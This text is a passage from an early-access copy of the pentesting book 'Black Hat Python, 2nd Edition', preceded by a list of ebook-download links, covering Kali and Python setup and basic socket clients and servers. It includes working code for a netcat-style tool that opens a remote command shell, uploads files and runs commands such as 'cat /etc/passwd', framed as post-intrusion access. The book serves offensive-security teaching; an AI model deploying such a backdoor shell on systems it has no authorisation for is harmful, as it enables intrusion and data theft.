Black Hat Python: Python Programming for Hackers

and Pentesters 2nd Edition Justin Seitz download

https://textbookfull.com/product/black-hat-python-python-
programming-for-hackers-and-pentesters-2nd-edition-justin-seitz/

Download more ebook from https://textbookfull.com

We believe these products will be a great fit for you. Click
the link to download now, or visit textbookfull.com
to discover even more!

Black Hat Go Go Programming For Hackers And Pentesters

Tom Steele

https://textbookfull.com/product/black-hat-go-go-programming-for-
hackers-and-pentesters-tom-steele/

Black Hat Go Go Programming For Hackers and Pentesters

1st Edition Tom Steele

https://textbookfull.com/product/black-hat-go-go-programming-for-
hackers-and-pentesters-1st-edition-tom-steele/

Beginning Programming with Python For Dummies 2nd

Edition John Paul Mueller

https://textbookfull.com/product/beginning-programming-with-
python-for-dummies-2nd-edition-john-paul-mueller/

Learning Scientific Programming With Python 2nd Edition

Christian Hill

https://textbookfull.com/product/learning-scientific-programming-
with-python-2nd-edition-christian-hill/
Learning Scientific Programming with Python 2nd Edition
Christian Hill

https://textbookfull.com/product/learning-scientific-programming-
with-python-2nd-edition-christian-hill-2/

Python Projects for Beginners: A Ten-Week Bootcamp

Approach to Python Programming Milliken

https://textbookfull.com/product/python-projects-for-beginners-a-
ten-week-bootcamp-approach-to-python-programming-milliken/

Matplotlib for Python Developers Effective techniques

for data visualization with Python 2nd Edition Yim

https://textbookfull.com/product/matplotlib-for-python-
developers-effective-techniques-for-data-visualization-with-
python-2nd-edition-yim/

Violent Python a cookbook for hackers forensic analysts

penetration testers and security engineers 1st Edition
O'Connor

https://textbookfull.com/product/violent-python-a-cookbook-for-
hackers-forensic-analysts-penetration-testers-and-security-
engineers-1st-edition-oconnor/

Python Programming for Data Analysis 1st Edition José

Unpingco

https://textbookfull.com/product/python-programming-for-data-
analysis-1st-edition-jose-unpingco/
 2ND EDITION

Black Hat Python

Python Programming for
Hackers and Pentesters

R L Y
A
E ESS
A C C
Justin Seitz and Tim Arnold
Foreword by Charlie Miller
 NO S TA RCH PRE SS
E A R LY A C C E S S P R O G R A M :
FEEDBACK WELCOME!

Welcome to the Early Access edition of the as yet unpublished Black Hat
Python, 2nd Edition by Justin Seitz and Tim Arnold! As a prepublication
title, this book may be incomplete and some chapters may not have been
proofread.
Our goal is always to make the best books possible, and we look forward
to hearing your thoughts. If you have any comments or questions, email us
at earlyaccess@nostarch.com. If you have specific feedback for us, please
include the page number, book title, and edition date in your note, and
we’ll be sure to review it. We appreciate your help and support!
We’ll email you as new chapters become available. In the meantime,
enjoy!
 BL ACK H AT P Y T H ON,
2ND EDITION
JUSTIN SEIT Z AND TIM ARNOLD
Early Access edition, 12/3/20

Copyright © 2021 by Justin Seitz and Tim Arnold.

ISBN-10: 978-1-7185-0112-6
ISBN-13: 978-1-7185-0113-3

Publisher: William Pollock

Executive Editor: Barbara Yien
Production Editor: Dapinder Dosanjh
Developmental Editor: Frances Saux
Cover Illustration: Garry Booth
Interior Design: Octopod Studios
Technical Reviewer: Cliff Janzen
Copyeditor: Bart Reed
Compositor: Happenstance Type-O-Rama
Proofreader: Sharon Wilkey

No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press,
Inc. Other product and company names mentioned herein may be the trademarks of their
respective owners. Rather than use a trademark symbol with every occurrence of a trade-
marked name, we are using the names only in an editorial fashion and to the benefit of the
trademark owner, with no intention of infringement of the trademark.

All rights reserved. No part of this work may be reproduced or transmitted in any form or by
any means, electronic or mechanical, including photocopying, recording, or by any informa-
tion storage or retrieval system, without the prior written permission of the copyright owner
and the publisher.

The information in this book is distributed on an “As Is” basis, without warranty. While every
precaution has been taken in the preparation of this work, neither the author nor No Starch
Press, Inc. shall have any liability to any person or entity with respect to any loss or damage
caused or alleged to be caused directly or indirectly by the information contained in it.
 CONTENTS

Preface
Chapter 1: Setting Up Your Python Environment . . . . . . . . . . . . 1
Chapter 2: The Network: Basics . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Chapter 3: The Network: Raw Sockets and Sniffing . . . . . . . . . 35
Chapter 4: Owning the Network with Scapy . . . . . . . . . . . . . . . 53
Chapter 5: Web Hackery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
Chapter 6: Extending Burp Proxy . . . . . . . . . . . . . . . . . . . . . . . 93
Chapter 7: GitHub Command and Control . . . . . . . . . . . . . . . 117
Chapter 8: Common Trojaning Tasks on Windows . . . . . . . . . 127
Chapter 9: Fun with Exfiltration . . . . . . . . . . . . . . . . . . . . . . . . 139
Chapter 10: Windows Privilege Escalation . . . . . . . . . . . . . . . . 153
Chapter 11: Offensive Forensics . . . . . . . . . . . . . . . . . . . . . . . . 169

The chapters in red are included in this Early Access PDF.

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

SE T T ING U P YOU R
1
PY THON ENVIRONMENT

This is the least fun, but nevertheless criti-

cal, part of the book, where we walk through
setting up an environment in which to write
and test Python. We’ll do a crash course in set-
ting up a Kali Linux virtual machine (VM), creating a
virtual environment for Python 3, and installing a nice
integrated development environment (IDE) so that you
have everything you need to develop code. By the end
of this chapter, you should be ready to tackle the exer-
cises and code examples in the remainder of the book.
Before you get started, if you don’t have a hypervisor virtualization client
such as VMware Player, VirtualBox, or Hyper-V, download and install one.
We also recommend that you have a Windows 10 VM at the ready. You can
get an evaluation Windows 10 VM here: https://developer.microsoft.com/en-us/
windows/downloads/virtual-machines/.
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

Installing Kali Linux

Kali, the successor to the BackTrack Linux distribution, was designed by
Offensive Security as a penetration testing operating system. It comes with
a number of tools preinstalled and is based on Debian Linux, so you’ll be
able to install a wide variety of additional tools and libraries.
You will use Kali as your guest virtual machine. That is, you’ll download
a Kali virtual machine and run it on your host machine using your hypervi-
sor of choice. You can download the Kali VM from https://www.kali.org/down-
loads/ and install it in your hypervisor of choice. Follow the instructions
given in the Kali documentation: https://www.kali.org/docs/installation/.
When you’ve gone through the steps of the installation, you should
have the full Kali desktop environment, as shown in Figure 1-1.

Figure 1-1: The Kali Linux desktop

Because there may have been important updates since the Kali image
was created, let’s update the machine with the latest version. In the Kali
shell (ApplicationsAccessoriesTerminal), execute the following:

tim@kali:~$ sudo apt update

tim@kali:~$ apt list --upgradable
tim@kali:~$ sudo apt upgrade
tim@kali:~$ sudo apt dist-upgrade
tim@kali:~$ sudo apt autoremove

2 Chapter 1
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

Setting Up Python 3
The first thing we’ll do is ensure that the correct version of Python is
installed. (The projects in this book use Python 3.6 or higher.) Invoke
Python from the Kali shell and have a look:

tim@kali:~$ python

This is what it looks like on our Kali machine:

Python 2.7.17 (default, Oct 19 2019, 23:36:22)

[GCC 9.2.1 20191008] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

Not exactly what we’re looking for. At the time of this writing, the
default version of Python on the current Kali installation is Python 2.7.18.
But this isn’t really a problem; you should have Python 3 installed as well:

tim@kali:~$ python3
Python 3.7.5 (default, Oct 27 2019, 15:43:29)
[GCC 9.2.1 20191022] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>

The version of Python listed here is 3.7.5. If yours is lower than 3.6,
upgrade your distribution with the following:

sudo apt-get upgrade python3

We will use Python 3 with a virtual environment, which is a self-contained

directory tree that includes a Python installation and the set of any extra
packages you install. The virtual environment is among the most essential
tools for a Python developer. Using one, you can separate projects that have
different needs. For example, you might use one virtual environment for proj-
ects involving packet inspection and a different one for projects on binary
analysis.
By having separate environments, you keep your projects simple and clean.
This ensures that each environment can have its own set of dependencies and
modules without disrupting any of your other projects.
Let’s create a virtual environment now. To get started, we need to
install the python3-venv package:

tim@kali:~$ sudo apt-get install python3-venv

[sudo] password for tim:
...

Setting Up Your Python Environment 3

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

Now we can create a virtual environment. Let’s make a new directory to

work in and create the environment:

tim@kali:~$ mkdir bhp

tim@kali:~$ cd bhp
tim@kali:~/bhp$ python3 -m venv venv3
tim@kali:~/bhp$ source venv3/bin/activate
(venv3) tim@kali:~/bhp$ python

That creates a new directory, bhp, in the current directory. We create a

new virtual environment by calling the venv package with the -m switch and
the name you want the new environment to have. We’ve called ours venv3,
but you can use any name you like. The scripts, packages, and Python
executable for the environment will live in that directory. Next, we activate
the environment by running the activate script. Notice that the prompt
changes once the environment is activated. The name of the environment
is prepended to your usual prompt (venv3 in our case). Later on, when
you’re ready to exit the environment, use the command deactivate.
Now you have Python set up and have activated a virtual environment.
Since we set up the environment to use Python 3, when you invoke Python,
you no longer have to specify python3—just python is fine, since that is what
we installed into the virtual environment. In other words, after activation,
every Python command will be relative to your virtual environment. Please
note that using a different version of Python might break some of the code
examples in this book.
We can use the pip executable to install Python packages into the virtual
environment. This is much like the apt package manager because it enables
you to directly install Python libraries into your virtual environment without
having to manually download, unpack, and install them.
You can search for packages and install them into your virtual environ-
ment with pip:

(venv3) tim@kali:~/bhp: pip search hashcrack

Let’s do a quick test and install the lxml module, which we’ll use in
Chapter 5 to build a web scraper. Enter the following into your terminal:

(venv3) tim@kali:~/bhp: pip install lxml

You should see output in your terminal indicating that the library is
being downloaded and installed. Then drop into a Python shell and vali-
date that it was installed correctly:

(venv3) tim@kali:~/bhp$ python

Python 3.7.5 (default, Oct 27 2019, 15:43:29)
[GCC 9.2.1 20191022] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from lxml import etree
>>> exit()
(venv3) tim@kali:~/bhp$

4 Chapter 1
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

If you get an error or a version of Python 2, make sure you followed all
the preceding steps and that you have the up-to-date version of Kali.
Keep in mind that for most examples throughout this book, you can
develop your code in a variety of environments, including Mac, Linux, and
Windows. You may also want to set up a different virtual environment for
separate projects or chapters. Some chapters are Windows specific, which
we’ll make sure to mention at the beginning of the chapter.
Now that we have our hacking virtual machine and a Python 3 virtual
environment set up, let’s install a Python IDE for development.

Installing an IDE
An integrated development environment (IDE) provides a set of tools for
coding. Typically, it includes a code editor, with syntax highlighting and
automatic linting, and a debugger. The purpose of the IDE is to make it eas-
ier to code and debug your programs. You don’t have to use one to program
in Python; for small test programs, you might use any text editor (such as
vim, nano, Notepad, or emacs). But for larger, more complex project, an
IDE will be of enormous help to you, whether by indicating variables you
have defined but not used, finding misspelled variable names, or locating
missing package imports.
In a recent Python developer survey, the top two favorite IDEs were
PyCharm (which has commercial and free versions available) and Visual
Studio Code (free). Justin is a fan of WingIDE (commercial and free ver-
sions available), and Tim uses Visual Studio Code (VS Code). All three IDEs
can be used on Windows, macOS, or Linux.
You can install PyCharm from https://www.jetbrains.com/pycharm/download/
or WingIDE from https://wingware.com/downloads/. You can install VS Code
from the Kali command line:

tim@kali#: apt-get install code

Or, to get the latest version of VS Code, download it from https://code

.visualstudio.com/download/ and install with apt-get:

tim@kali#: apt-get install -f ./code_1.39.2-1571154070_amd64.deb

The release number, which is part of the filename, will likely be differ-
ent from the one shown here, so make sure the filename you use matches
the one you downloaded.

Code Hygiene
No matter what you use to write your programs, it is a good idea to follow a
code-formatting guideline. A code style guide provides recommendations to
improve the readability and consistency of your Python code. It makes it eas-
ier for you to understand your own code when you read it later or for others if

Setting Up Your Python Environment 5

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

you decide to share it. The Python community has a such a guideline, called
PEP 8. You can read the full PEP 8 guide here: https://www.python.org/dev/peps/
pep-0008/.
The examples in this book generally follow PEP 8, with a few differ-
ences. You’ll see that the code in this book follows a pattern like this:

1 from lxml import etree

from subprocess import Popen

2 import argparse
import os

3 def get_ip(machine_name):
pass

4 class Scanner:
def __init__(self):
pass

5 if __name__ == '__main__':
scan = Scanner()
print('hello')

At the top of our program, we import the packages we need. The first
import block 1 is in the form of from XXX import YYY type. Each import line
is in alphabetical order.
The same holds true for the module imports—they, too, are in alphabet-
ical order 2. This ordering lets you see at a glance whether you’ve imported a
package without reading every line of imports, and it ensures that you don’t
import a package twice. The intent is to keep your code clean and lessen the
amount you have to think when you reread your code.
Next come the functions 3, then class definitions 4, if you have any.
Some coders prefer to never have classes and rely only on functions. There’s
no hard-and-fast rule here, but if you find you’re trying to maintain state
with global variables or passing the same data structures to several func-
tions, that may be an indication that your program would be easier to
understand if you refactor it to use a class.
Finally, the main block at the bottom 5 gives you the opportunity to use
your code in two ways. First, you can use it from the command line. In this
case, the module’s internal name is __main__ and the main block is executed.
For example, if the name of the file containing the code is scan.py, you could
invoke it from the command line as follows:

python scan.py

This will load the functions and classes in scan.py and execute the main
block. You would see the response hello on the console.
Second, you can import your code into another program with no side
effects. For example, you would import the code with

import scan

6 Chapter 1
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

Since its internal name is the name of the Python module, scan, and not
__main__, you have access to all the module’s defined functions and classes,
but the main block is not executed.
You’ll also notice we avoid variables with generic names. The better
you get at naming your variables, the easier it will be to understand the
program.
You should have a virtual machine, Python 3, a virtual environment,
and an IDE. Now let’s get into some actual fun!

Setting Up Your Python Environment 7

Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold
Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

THE NE T WORK: BA SICS

2
The network is and always will be the sexi-
est arena for a hacker. An attacker can do
almost anything with simple network access,
such as scan for hosts, inject packets, sniff data,
and remotely exploit hosts. But if you’ve worked your
way into the deepest depths of an enterprise target,
you may find yourself in a bit of a conundrum: you
have no tools to execute network attacks. No netcat.
No Wireshark. No compiler, and no means to install
one. However, you might be surprised to find that
in many cases, you’ll have a Python install. So that’s
where we’ll begin.
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

This chapter will give you some basics on Python networking using the
1
socket module. Along the way, we’ll build clients, servers, and a TCP proxy.
We’ll then turn them into our very own netcat, complete with a command
shell. This chapter is the foundation for subsequent chapters, in which we’ll
build a host discovery tool, implement cross-platform sniffers, and create a
remote trojan framework. Let’s get started.

Python Networking in a Paragraph

Programmers have a number of third-party tools to create networked serv-
ers and clients in Python, but the core module for all of those tools is socket.
This module exposes all of the necessary pieces to quickly write Transmission
Control Protocol (TCP) and User Datagram Protocol (UDP) clients and
servers, use raw sockets, and so forth. For the purposes of breaking in or
maintaining access to target machines, this module is all you really need.
Let’s start by creating some simple clients and servers—the two most com-
mon quick network scripts you’ll write.

The TCP Client

Countless times during penetration tests, we (the authors) have needed to
whip up a TCP client to test for services, send garbage data, fuzz, or per-
form any number of other tasks. If you are working within the confines of
large enterprise environments, you won’t have the luxury of using network-
ing tools or compilers, and sometimes you’ll even be missing the absolute
basics, like the ability to copy/paste or connect to the internet. This is
where being able to quickly create a TCP client comes in extremely handy.
But enough jabbering—let’s get coding. Here is a simple TCP client:

import socket

target_host = "www.google.com"
target_port = 80

# create a socket object

1 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect the client

2 client.connect((target_host,target_port))

# send some data

3 client.send(b"GET / HTTP/1.1\r\nHost: google.com\r\n\r\n")

# receive some data

4 response = client.recv(4096)

print(response.decode())
client.close()

1. The full socket documentation can be found here: http://docs.python.org/3/library/socket.html.

10 Chapter 2
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

We first create a socket object with the AF_INET and SOCK_STREAM param-
eters 1. The AF_INET parameter indicates we’ll use a standard IPv4 address
or hostname, and SOCK_STREAM indicates that this will be a TCP client. We
then connect the client to the server 2 and send it some data as bytes 3.
The last step is to receive some data back and print out the response 4 and
then close the socket. This is the simplest form of a TCP client, but it’s the
one you’ll write most often.
This code snippet makes some serious assumptions about sockets that
you definitely want to be aware of. The first assumption is that our con-
nection will always succeed, and the second is that the server expects us to
send data first (some servers expect to send data to you first and await your
response). Our third assumption is that the server will always return data
to us in a timely fashion. We make these assumptions largely for simplic-
ity’s sake. While programmers have varied opinions about how to deal
with blocking sockets, exception-handling in sockets, and the like, it’s
quite rare for pentesters to build these niceties into their quick-and-dirty
tools for recon or exploitation work, so we’ll omit them in this chapter.

UDP Client
A Python UDP client is not much different from a TCP client; we need to
make only two small changes to get it to send packets in UDP form:

import socket

target_host = "127.0.0.1"
target_port = 9997

# create a socket object

1 client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# send some data

2 client.sendto(b"AAABBBCCC",(target_host,target_port))

# receive some data

3 data, addr = client.recvfrom(4096)

print(data.decode())
client.close()

As you can see, we change the socket type to SOCK_DGRAM 1 when creat-
ing the socket object. The next step is to simply call sendto() 2, passing in
the data and the server you want to send the data to. Because UDP is a con-
nectionless protocol, there is no call to connect() beforehand. The last step
is to call recvfrom() 3 to receive UDP data back. You will also notice that it
returns both the data and the details of the remote host and port.
Again, we’re not looking to be superior network programmers; we want
it to be quick, easy, and reliable enough to handle our day-to-day hacking
tasks. Let’s move on to creating some simple servers.

The Network: Basics 11

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

TCP Server
Creating TCP servers in Python is just as easy as creating a client. You might
want to use your own TCP server when writing command shells or crafting a
proxy (both of which we’ll do later). Let’s start by creating a standard multi-
threaded TCP server. Crank out the following code:

import socket
import threading

IP = '0.0.0.0'
PORT = 9998

def main()
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1 server.bind((IP, PORT))
2 server.listen(5)
print(f'[*] Listening on {IP}:{PORT}')

while True:
3 client, address = server.accept()
print(f'[*] Accepted connection from {address[0]}:{address[1]}')
client_handler = threading.Thread(target=handle_client,
args=(client,))
4 client_handler.start()

5 def handle_client(client_socket):
with client_socket as sock:
request = sock.recv(1024)
print(f'[*] Received: {request.decode("utf-8")}')
sock.send(b'ACK')

if __name__ == '__main__':
main()

To start off, we pass in the IP address and port we want the server to lis-
ten on 1. Next, we tell the server to start listening 2, with a maximum back-
log of connections set to 5. We then put the server into its main loop, where
it waits for an incoming connection. When a client connects 3, we receive
the client socket in the client variable and the remote connection details in
the address variable. We then create a new thread object that points to our
handle_client function, and we pass it the client socket object as an argument.
We then start the thread to handle the client connection 4, at which point
the main server loop is ready to handle another incoming connection. The
handle_client function 5 performs the recv() and then sends a simple mes-
sage back to the client.
If you use the TCP client that we built earlier, you can send some test
packets to the server. You should see output like the following:

[*] Listening on 0.0.0.0:9998

[*] Accepted connection from: 127.0.0.1:62512
[*] Received: ABCDEF

12 Chapter 2
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

That’s it! While pretty simple, this is a very useful piece of code. We’ll
extend it in the next couple of sections, when we build a netcat replacement
and a TCP proxy.

Replacing Netcat
Netcat is the utility knife of networking, so it’s no surprise that shrewd sys-
tems administrators remove it from their systems. Such a useful tool would
be quite an asset if an attacker managed to find a way in. With it, you can
read and write data across the network, meaning you can use it to execute
remote commands, pass files back and forth, or even open a remote shell.
On more than one occasion, I’ve run into servers that don’t have netcat
installed but do have Python. In these cases, it’s useful to create a simple
network client and server that you can use to push files, or a listener that
gives you command line access. If you’ve broken in through a web applica-
tion, it’s definitely worth dropping a Python callback to give you second-
ary access without having to first burn one of your trojans or backdoors.
Creating a tool like this is also a great Python exercise, so let’s get started
writing netcat.py:

import argparse
import socket
import shlex
import subprocess
import sys
import textwrap
import threading

def execute(cmd):
cmd = cmd.strip()
if not cmd:
return
1 output = subprocess.check_output(shlex.split(cmd),
stderr=subprocess.STDOUT)
return output.decode()

Here, we import all of our necessary libraries and set up the execute
function, which receives a command, runs it, and returns the output as
a string. This function contains a new library we haven’t covered yet: the
subprocess library. This library provides a powerful process-creation inter-
face that gives you a number of ways to interact with client programs. In
this case 1, we’re using its check_output method, which runs a command
on the local operating system and then returns the output from that
command.
Now let’s create our main block responsible for handling command line
arguments and calling the rest of our functions:

if __name__ == '__main__':
parser = argparse.ArgumentParser( 1
description='BHP Net Tool',

The Network: Basics 13

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent('''Example: 2
netcat.py -t 192.168.1.108 -p 5555 -l -c # command shell
netcat.py -t 192.168.1.108 -p 5555 -l -u=mytest.txt # upload to file
netcat.py -t 192.168.1.108 -p 5555 -l -e=\"cat /etc/passwd\" # execute command
echo 'ABC' | ./netcat.py -t 192.168.1.108 -p 135 # echo text to server port 135
netcat.py -t 192.168.1.108 -p 5555 # connect to server
'''))
parser.add_argument('-c', '--command', action='store_true', help='command shell') 3
parser.add_argument('-e', '--execute', help='execute specified command')
parser.add_argument('-l', '--listen', action='store_true', help='listen')
parser.add_argument('-p', '--port', type=int, default=5555, help='specified port')
parser.add_argument('-t', '--target', default='192.168.1.203', help='specified IP')
parser.add_argument('-u', '--upload', help='upload file')
args = parser.parse_args()
if args.listen: 4
buffer = ''
else:
buffer = sys.stdin.read()

nc = NetCat(args, buffer.encode())
nc.run()

We use the argparse module from the standard library to create a com-
mand line interface 1. We’ll provide arguments so it can be invoked to
upload a file, execute a command, or start a command shell.
We provide example usage that the program will display when the user
invokes it with --help 2 and add six arguments that specify how we want the
program to behave 3. The -c argument sets up an interactive shell, the -e
argument executes one specific command, the -l argument indicates that
a listener should be set up, the -p argument specifies the port on which to
communicate, the -t argument specifies the target IP, and the -u argument
specifies the name of a file to upload. Both the sender and receiver can
use this program, so the arguments define whether it’s invoked to send or
listen. The -c, -e, and -u arguments imply the -l argument, because those
arguments only apply to the listener side of the communication. The sender
side makes the connection to the listener, and so it only needs the -t and -p
arguments to define the target listener.
If we’re setting it up as a listener 4, we invoke the NetCat object with
an empty buffer string. Otherwise, we send the buffer content from stdin.
Finally, we call the run method to start it up.
Now let’s start putting in the plumbing for some of these features,
beginning with our client code. Add the following code above the main
block:

class NetCat:
1 def __init__(self, args, buffer=None):
self.args = args
self.buffer = buffer
2 self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

14 Chapter 2
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold
def run(self):
if self.args.listen:
3 self.listen()
else:
4 self.send()

We initialize the NetCat object with the arguments from the command
line and the buffer 1 and then create the socket object 2.
The run method, which is the entry point for managing the NetCat object,
is pretty simple: it delegates execution to two methods. If we’re setting up a
listener, we call the listen method 3. Otherwise, we call the send method 4.
Now let’s write that send method:

def send(self):
1 self.socket.connect((self.args.target, self.args.port))
if self.buffer:
self.socket.send(self.buffer)

2 try:
3 while True:
recv_len = 1
response = ''
while recv_len:
data = self.socket.recv(4096)
recv_len = len(data)
response += data.decode()
if recv_len < 4096:
4 break
if response:
print(response)
buffer = input('> ')
buffer += '\n'
5 self.socket.send(buffer.encode())
6 except KeyboardInterrupt:
print('User terminated.')
self.socket.close()
sys.exit()

We connect to the target and port 1, and if we have a buffer, we send

that to the target first. Then we set up a try/catch block so we can manually
close the connection with CTRL-C 2. Next, we start a loop 3 to receive
data from the target. If there is no more data, we break out of the loop 4.
Otherwise, we print the response data and pause to get interactive input,
send that input 5, and continue the loop.
The loop will continue until the KeyboardInterrupt occurs (CTRL-C) 6,
which will close the socket.
Now let’s write the method that executes when the program runs as a
listener:

def listen(self):
1 self.socket.bind((self.args.target, self.args.port))
self.socket.listen(5)

The Network: Basics 15

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

2 while True:
client_socket, _ = self.socket.accept()
3 client_thread = threading.Thread(
target=self.handle, args=(client_socket,)
)
client_thread.start()

The listen method binds to the target and port 1 and starts listening
in a loop 2, passing the connected socket to the handle method 3.
Now let’s implement the logic to perform file uploads, execute com-
mands, and create an interactive shell. The program can perform these
tasks when operating as a listener.

def handle(self, client_socket):

1 if self.args.execute:
output = execute(self.args.execute)
client_socket.send(output.encode())

2 elif self.args.upload:
file_buffer = b''
while True:
data = client_socket.recv(4096)
if data:
file_buffer += data
else:
break

with open(self.args.upload, 'wb') as f:

f.write(file_buffer)
message = f'Saved file {self.args.upload}'
client_socket.send(message.encode())

3 elif self.args.command:
cmd_buffer = b''
while True:
try:
client_socket.send(b'BHP: #> ')
while '\n' not in cmd_buffer.decode():
cmd_buffer += client_socket.recv(64)
response = execute(cmd_buffer.decode())
if response:
client_socket.send(response.encode())
cmd_buffer = b''
except Exception as e:
print(f'server killed {e}')
self.socket.close()
sys.exit()

The handle method executes the task corresponding to the command

line argument it receives: execute a command, upload a file, or start a
shell. If a command should be executed 1, the handle method passes that

16 Chapter 2
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

command to the execute function and sends the output back on the socket. If
a file should be uploaded 2, we set up a loop to listen for content on the lis-
tening socket and receive data until there’s no more data coming in. Then we
write that accumulated content to the specified file. Finally, if a shell is to be
created 3, we set up a loop, send a prompt to the sender, and wait for a com-
mand string to come back. We then execute the command using the execute
function and return the output of the command to the sender.
You’ll notice that the shell scans for a newline character to determine
when to process a command, which makes it netcat friendly. That is, you can
use this program on the listener side and use netcat itself on the sender side.
However, if you’re conjuring up a Python client to speak to it, remember to
add the newline character. In the send method, you can see we do add the
newline character after we get input from the console.

Kicking the Tires

Now let’s play around with it a bit to see some output. In one terminal or
cmd.exe shell, run the script with the --help argument:

$ python netcat.py --help

usage: netcat.py [-h] [-c] [-e EXECUTE] [-l] [-p PORT] [-t TARGET] [-u UPLOAD]

BHP Net Tool

optional arguments:
-h, --help show this help message and exit
-c, --command initialize command shell
-e EXECUTE, --execute EXECUTE
execute specified command
-l, --listen listen
-p PORT, --port PORT specified port
-t TARGET, --target TARGET
specified IP
-u UPLOAD, --upload UPLOAD
upload file

Example:
netcat.py -t 192.168.1.108 -p 5555 -l -c # command shell
netcat.py -t 192.168.1.108 -p 5555 -l -u=mytest.txt # upload to file
netcat.py -t 192.168.1.108 -p 5555 -l -e="cat /etc/passwd" # execute command
echo 'ABCDEFGHI' | ./netcat.py -t 192.168.1.108 -p 135
# echo local text to server port 135
netcat.py -t 192.168.1.108 -p 5555 # connect to server

Now, on your Kali machine, set up a listener using its own IP and port
5555 to provide a command shell:

$ python netcat.py -t 192.168.1.203 -p 5555 -l -c

Now fire up another terminal on your local machine and run the script
in client mode. Remember that the script reads from stdin and will do so

The Network: Basics 17

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

until it receives the end-of-file (EOF) marker. To send EOF, press CTRL-D
on your keyboard:

% python netcat.py -t 192.168.1.203 -p 5555

CTRL-D
<BHP:#> ls -la
total 23497
drwxr-xr-x 1 502 dialout 608 May 16 17:12 .
drwxr-xr-x 1 502 dialout 512 Mar 29 11:23 ..
-rw-r--r-- 1 502 dialout 8795 May 6 10:10 mytest.png
-rw-r--r-- 1 502 dialout 14610 May 11 09:06 mytest.sh
-rw-r--r-- 1 502 dialout 8795 May 6 10:10 mytest.txt
-rw-r--r-- 1 502 dialout 4408 May 11 08:55 netcat.py
<BHP: #> uname -a
Linux kali 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1 (2019-12-09) x86_64 GNU/Linux

You can see that we receive our custom command shell. Because we’re
on a Unix host, we can run local commands and receive output in return,
as if we had logged in via SSH or were on the box locally. We can perform
the same setup on the Kali machine but have it execute a single command
using the -e switch:

$ python netcat.py -t 192.168.1.203 -p 5555 -l -e="cat /etc/passwd"

Now, when we connect to Kali from the local machine, we’re rewarded
with the output from the command:

% python netcat.py -t 192.168.1.203 -p 5555

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin

We could also use netcat on the local machine:

% nc 192.168.1.203 5555
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin

Finally, we could use the client to send out requests the good, old-
fashioned way:

$ echo -ne "GET / HTTP/1.1\r\nHost: reachtim.com\r\n\r\n" |python ./netcat.py -t reachtim.com

-p 80

HTTP/1.1 301 Moved Permanently

18 Chapter 2
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold
Server: nginx
Date: Mon, 18 May 2020 12:46:30 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 229
Connection: keep-alive
Location: https://reachtim.com/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://reachtim.com/">here</a>.</p>
</body></html>

There you go! While not a super technical technique, it’s a good foun-
dation for hacking together some client and server sockets in Python and
using them for evil. Of course, this program covers only the fundamentals;
use your imagination to expand or improve it. Next, let’s build a TCP proxy,
which is useful in any number of offensive scenarios.

Building a TCP Proxy

There are a number of reasons to have a TCP proxy in your tool belt. You
might use one for forwarding traffic to bounce from host to host, or when
assessing network-based software. When performing penetration tests in
enterprise environments, you probably won’t be able to run Wireshark; nor
will you be able to load drivers to sniff the loopback on Windows, and net-
work segmentation will prevent you from running your tools directly against
your target host. We’ve built simple Python proxies, like this one, in a num-
ber of cases to help you understand unknown protocols, modify traffic being
sent to an application, and create test cases for fuzzers.
The proxy has a few moving parts. Let’s summarize the four main func-
tions we need to write. We need to display the communication between the
local and remote machines to the console (hexdump). We need to receive data
from an incoming socket from either the local or remote machine (receive_
from). We need to manage the traffic direction between remote and local
machines (proxy_handler). Finally, we need to set up a listening socket and
pass it to our proxy_handler (server_loop).
Let’s get to it. Open a new file called proxy.py:

import sys
import socket
import threading

1 HEX_FILTER = ''.join(
[(len(repr(chr(i))) == 3) and chr(i) or '.' for i in range(256)])

